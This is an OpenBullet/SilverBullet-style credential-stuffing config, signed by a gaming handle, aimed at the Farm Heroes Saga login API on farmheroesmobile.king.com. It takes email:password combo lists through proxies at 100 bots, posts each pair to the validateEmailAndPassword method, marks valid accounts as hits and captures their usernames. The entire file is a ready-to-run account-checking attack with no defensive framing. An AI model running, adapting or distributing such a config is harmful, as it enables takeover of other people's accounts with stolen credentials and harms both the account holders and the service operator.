[SETTINGS]
{
  "Name": "farm heroes saga Api",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-02-28T15:28:50.0121611+00:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "🔥 YASHVIRGAMING#7131 🔥",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "farm heroes saga",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST GET "https://farmheroesmobile.king.com/rpc/ClientApi?_session=xsyNjboZgeiZMY1zwNwh5Q.2" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#session PARSE "<COOKIES(sess)>" LR "" "" -> VAR "sess" 

REQUEST POST "https://farmheroesmobile.king.com/rpc/ClientApi?_session=xsyNjboZgeiZMY1zwNwh5Q.2 " 
  CONTENT "[{\"jsonrpc\":\"2.0\",\"id\":58,\"method\":\"AppKingdomApi.validateEmailAndPassword\",\"params\":[\"<USER>\",\"<PASS>\"]}]" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: 26;v1;5.76.1;3;1" 
  HEADER "x-king-build: 5.76.1" 
  HEADER "x-king-country: us" 
  HEADER "x-king-platform: 3" 
  HEADER "Cookie: sess=<sess>" 
  HEADER "Content-Length: 132" 
  HEADER "Host: farmheroesmobile.king.com" 
  HEADER "Connection: Keep-Alive" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "\"status\":\"OK\"" 
  KEYCHAIN Failure OR 
    KEY "ERR_WRONG_EMAIL_OR_PASSWORD" 

#username PARSE "<SOURCE>" LR "\"username\":\"" "\"" CreateEmpty=FALSE -> CAP "Username" 

FUNCTION Constant "🔥 YASHVIRGAMING#7131 🔥" -> CAP "Config by" 

